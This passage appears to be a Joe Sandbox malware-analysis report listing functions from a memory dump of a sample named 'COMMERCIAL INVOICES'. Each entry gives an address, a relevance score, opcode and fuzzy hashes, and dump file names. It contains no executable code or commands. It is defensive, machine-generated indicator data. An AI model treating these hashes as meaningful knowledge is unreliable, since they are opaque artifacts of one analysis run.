                                                                                                                                                                                                                                      • Opcode ID: 02d09a4147ea8f1e6b8664396d7936cfa191b2b1230f6a33a907ad18258b21fb
                                                                                                                                                                                                                                      • Instruction ID: 9059b814616d1097882e7966a4646d3d49afe163fe7448b3e5ed5a4ccc8a6113
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 02d09a4147ea8f1e6b8664396d7936cfa191b2b1230f6a33a907ad18258b21fb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FC21A07591012ADBCF15DF59C881ABEB7F8FF48740F400069FA41AB240D738AD51CBA4
                                                                                                                                                                                                                                      Function 012C019F Relevance: .1, Instructions: 78COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: c8fade1e1736a9dc90add951fb303b8aee22f57551b46327e1d1cacaa9b114d3
                                                                                                                                                                                                                                      • Instruction ID: 7f3801719cc11d881e3375805f739957966fb652372949dba8f7a6d81fdd498a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c8fade1e1736a9dc90add951fb303b8aee22f57551b46327e1d1cacaa9b114d3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9F218975620645EBD715DB6CC880A6AB7B8FF88B80F140169FA04DB6A0D634ED40CBA8
                                                                                                                                                                                                                                      Function 012C0283 Relevance: .1, Instructions: 74COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 18384324abe74b7e4fe3681b0f9ed9608a93a6c1a432e2e905ec0e7a4d65f38e
                                                                                                                                                                                                                                      • Instruction ID: ba8c7dd2ff806ec4371c063cfd13d0d3b1ec4bba7b991e09f80af65f7f45bb33
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 18384324abe74b7e4fe3681b0f9ed9608a93a6c1a432e2e905ec0e7a4d65f38e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F621B372924346DFD711EF59C844B6BBBECAF91A40F08055ABF80CB251D734D944C7A6
                                                                                                                                                                                                                                      Function 01262835 Relevance: .1, Instructions: 73COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 504f32862b16f82125b05d751bca65d8e498a62488d8ecbcaf5cf303cb692345
                                                                                                                                                                                                                                      • Instruction ID: 2aa4f238c4f24ab516db6b9e5f1bd519f0294040d9b85116d2d0f44e34a86526
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 504f32862b16f82125b05d751bca65d8e498a62488d8ecbcaf5cf303cb692345
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 68210B31675A82DBE322976C8C44B387B99BF41B74F190364FB619B6D2D768C841C250
                                                                                                                                                                                                                                      Function 0127A30B Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: a439e2116a6841253b088f0b75f212432b2b530667182ef6408dfa44bf90f13f
                                                                                                                                                                                                                                      • Instruction ID: 7784937095c78fb93e2f729653c46dae32066f8b55c3b4241b0399d8f04d8fb8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a439e2116a6841253b088f0b75f212432b2b530667182ef6408dfa44bf90f13f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3521BE752216019FC725DF29CC41B5677F5FF48754F188468E509CBB61E371E842CB98
                                                                                                                                                                                                                                      Function 012FA49A Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 555e6d9dad00fd477686cac8b8b175a5ca5dc80a11e80e55c9987d72b250a5a1
                                                                                                                                                                                                                                      • Instruction ID: 2bc7f1ede64ed91bd8ba3505b4af4d11dc5a717dc6e5bdd473d93422ea7837df
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 555e6d9dad00fd477686cac8b8b175a5ca5dc80a11e80e55c9987d72b250a5a1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6611A7726A0B11BFD7225555AC45F67B69ADBD4B60F11003CB71CDB290DB70DC018795
                                                                                                                                                                                                                                      Function 012C0946 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 3843e602d062089ecf01b48d5646a20fce6e1ab9b56cbc0c22061410ffdfd8c7
                                                                                                                                                                                                                                      • Instruction ID: e35ee57a4c20eed9ddb3bbacc6386c5e11f2e8658e22ad2048119237f2583919
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3843e602d062089ecf01b48d5646a20fce6e1ab9b56cbc0c22061410ffdfd8c7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FF21E9B5E10219ABDB24DFAAD881AAEFBF8FF98B10F10412EE505A7244D7709941CB54
                                                                                                                                                                                                                                      Function 012D80A8 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                                                                                                                                                      • Instruction ID: 6685a832cc0e79852508d36eac454f378432a8f5ffb667e51edebb9769199f44
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 84218C72A1020AEFDF129FA8CC40BAEBBB9EF98350F204459F940A7251D774D9509B50
                                                                                                                                                                                                                                      Function 01270124 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                                                                                                                                                      • Instruction ID: 29de1ecf54d2fb19f5f0f4243312499ba0524f830bec260db9fc3d012c1d8c10
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FE11E272611606AFD7229B44DC41FABBBB9EB81754F100029F7018B180D6B1ED48DB54
                                                                                                                                                                                                                                      Function 01248770 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 83bda1ef21544a3cfcc0f6eb202ba75b23a0cd093d65d6c679b98df77c95212b
                                                                                                                                                                                                                                      • Instruction ID: 810c1321ed2996936826cdd331afea2fa4f4860c1ca5cfe3f790ccae962c9bdf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 83bda1ef21544a3cfcc0f6eb202ba75b23a0cd093d65d6c679b98df77c95212b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A411B6767306169BDB1DCF8DC480A26BBE5AF4A750B15406DEF089F204D6B1D901C790
                                                                                                                                                                                                                                      Function 012480E9 Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 5206183d9c3d3028ce46e1d57ec8a33f9b41d88edece536407be15a7d09ba192
                                                                                                                                                                                                                                      • Instruction ID: 6894549112737ba51704110f0a7c1110aaf34b9f107f7f24cd7cd14f943eb222
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5206183d9c3d3028ce46e1d57ec8a33f9b41d88edece536407be15a7d09ba192
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F216F75A20206DFCB19CF98C581A6EBBF5FB88714F24416ED609A7311C771AD46CBD0
                                                                                                                                                                                                                                      Function 0127674D Relevance: .1, Instructions: 65COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 595209a1c86467d5d9d86248adf3a105280fef90e6409e4e2d6ddd40a01388ab
                                                                                                                                                                                                                                      • Instruction ID: 5bc79fcb9ece85bb4df221caa96a7ffe692fc145d65bd953f9d5c4c3a03bc381
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 595209a1c86467d5d9d86248adf3a105280fef90e6409e4e2d6ddd40a01388ab
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 92218C75620A01EFE7249F68C881B67B7E8FF84390F44882DE59AC7251DA71A850CB64
                                                                                                                                                                                                                                      Function 012D6870 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 1dfde1f69e9a4c382caf98371767619e56474e4ef123ed771e4de5693ccb9c37
                                                                                                                                                                                                                                      • Instruction ID: 6ce8cc76e17d2572bf07820a6c4fbae3c0bba19bb44c2dde0a1068489aa500e5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1dfde1f69e9a4c382caf98371767619e56474e4ef123ed771e4de5693ccb9c37
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2011C632260615EFC722DF6DCD41FDA77A8EF99750F114025F605DB251DA70E905C790
                                                                                                                                                                                                                                      Function 0126E8C0 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: aee3811e8eb4c6b8fb8139ec8bdffa1924a60726c44b80dc7f6d1034794119bb
                                                                                                                                                                                                                                      • Instruction ID: 93c468243d7cde831be285b6cf31c7b86b4d033593227a5474b90685f0da713d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aee3811e8eb4c6b8fb8139ec8bdffa1924a60726c44b80dc7f6d1034794119bb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 34116F773201519FCB1ADB29CD81A3F725BDFD5374B65452DD922CB281E9308802C794
                                                                                                                                                                                                                                      Function 012766B0 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 68defc80a507c141efaf0127ba34c72a653bfda43cf1c33d2841886f8addfe29
                                                                                                                                                                                                                                      • Instruction ID: cb06a898d6a20251e498ba5c15c5696e9a3098700a18aad1abd8550cfa4a3787
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 68defc80a507c141efaf0127ba34c72a653bfda43cf1c33d2841886f8addfe29
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B611E3B6A21646EFDB29CF59C581A5BFBF8EF84790F154079DA059B310E670DD00CB90
                                                                                                                                                                                                                                      Function 0130A8E4 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                                                                                                                                                                      • Instruction ID: 437f06084fc61162ff451fb7b86ad80afb4ab5232233a1020211b0c5e880e2eb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8E11E636A00509AFDB19CB58C811B9EF7F5EF84214F054269E84597380D631AD41CB80
                                                                                                                                                                                                                                      Function 012CE7E1 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                                                                                                                                                      • Instruction ID: 472c903adcb198a9c5bfd700d991def7922ae9aece201d9c3e62f794363374dc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9011BF31621602EBEB259B48C841B6B7FA6EB45B54F06872CEB089B260D770DC40DB90
                                                                                                                                                                                                                                      Function 012627ED Relevance: .1, Instructions: 58COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 612a09ba85fd7c68fad684428af5964db532d4d0bd9cc8930965dc6e38a7068b
                                                                                                                                                                                                                                      • Instruction ID: ea72a1ad94c0ba129ad2ec9bdbae14514d0e8fda3be3cf3083eeda75939af4c5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 612a09ba85fd7c68fad684428af5964db532d4d0bd9cc8930965dc6e38a7068b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1D012231236646AFF326A26EDC88F377B9CFF80794F450065FA018B290DA64DC00C2B1
                                                                                                                                                                                                                                      Function 01244690 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 2cca9a8c1adf7e813c0dc1edbd53f6d841fa0ff8755d8a556873e25d4af02a82
                                                                                                                                                                                                                                      • Instruction ID: 853cd85bbfb43e8c055990672ce3df03a6792edf715e08e48eae94a076c5e769
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2cca9a8c1adf7e813c0dc1edbd53f6d841fa0ff8755d8a556873e25d4af02a82
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4811E536261686AFDB2EEF5DD841F567BA8EB96764F004119FA048B350C370F851CF60
                                                                                                                                                                                                                                      Function 01314B00 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 43bb9560fd0cf95be681ab8644168f835ec04bf4693a4e5c5b70c98128239862
                                                                                                                                                                                                                                      • Instruction ID: 0498a8d252abfa9c42e1558ee560474152d15e6f9f64bd69bf921484bfe10201
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 43bb9560fd0cf95be681ab8644168f835ec04bf4693a4e5c5b70c98128239862
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3011C6362006159FD725DA69D840F66B7A9FFC4715F198419EA8687698DB30E802C790
                                                                                                                                                                                                                                      Function 01276620 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: d0896b122e20287223dced830eec6298f60a75edb72d0be26d556e8e0075b107
                                                                                                                                                                                                                                      • Instruction ID: e8fb714e99dce10432836f80ef3e67f88f5966d9b6bb4a222396a45c4f3927ec
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d0896b122e20287223dced830eec6298f60a75edb72d0be26d556e8e0075b107
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0C11C276A10B16AFEB21DF59C9C0B5FFBB8EF84740F900058EA01A7200D734AD018B64
                                                                                                                                                                                                                                      Function 0126EA2E Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 73a34996e9788c8b8c91d9bd9e54cac25fa35810addd8d6e6a20230b94c09e05
                                                                                                                                                                                                                                      • Instruction ID: b4413384df0be83d5ed7b7c0bc92e2dda3b52332a0f01a4c27bf5b6f8d43059d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 73a34996e9788c8b8c91d9bd9e54cac25fa35810addd8d6e6a20230b94c09e05
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8101F17552010A9FD725DF18D448F2ABBFDFBC1318F22816AE1048B2A0C774EC82CB94
                                                                                                                                                                                                                                      Function 0126E53E Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                                                                                                                                                      • Instruction ID: d9621150bd1f7f12b35da5b858255335b3373abd2011459e91a2891871ef9d52
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE1186752326C39BE722D71C9654B6977A8BB41794F1A00A1EF4187692F76CD882C250
                                                                                                                                                                                                                                      Function 012CE75D Relevance: .1, Instructions: 54COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                                                                                                                                                      • Instruction ID: a7bde9062e4f8621f45e910121a27aea166d52164d1ca9c38c71f560f093b790
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 93019632620506AFFB2A9F58C841F6A7EA9EB45F50F068628EB059B260D771DD44CB90
                                                                                                                                                                                                                                      Function 0123A250 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
